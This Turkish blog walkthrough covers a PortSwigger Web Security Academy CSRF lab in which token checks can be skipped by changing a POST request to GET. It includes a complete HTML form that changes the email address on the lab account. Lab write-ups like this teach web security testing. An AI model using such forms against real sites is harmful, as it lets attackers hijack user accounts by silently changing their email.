Bu bölümde öncekinden farkı olarak sadece GET ve POST değerleriyle oynayacağız.
Lab 2 : https://portswigger.net/web-security/csrf/lab-token-validation-depends-on-request-method
Bölümdeki amaç CSRF zafiyetinin hem POST hem GET isteğinde zafiyetli olmasıdır.
Daha fazla okuyun ; https://security.stackexchange.com/questions/90023/get-and-post-request-vulnerable-to-csrf-attack
Sağ tık , kaynağı görüntüle dedikten sonra aynı mail formunu alıyorum, POST olan değeri GET olarak değiştiriyorum.
<form class="login-form" action="https://ac9a1faa1f62469b80601bf2008c00d3.web-security-academy.net/email" method="GET">
<label>Email</label>
<input required type="email" name="email" value="offsec@msn.com">
<input required type="hidden" name="csrf" value="Ou95ZedHZtOE0cJwyAtuai3RjCPgFtxN">
<button class='button' type='submit'> Update email </button>
</form>Her şeyi doğru yaptıysanız muhtemelen başarılı sonuç alacaksınız.
Sorularınız için yorum yapmayı unutmayın.
English
Arabic
Chinese (Simplified)
Dutch
French
German
Italian
Portuguese
Russian
Spanish
Turkish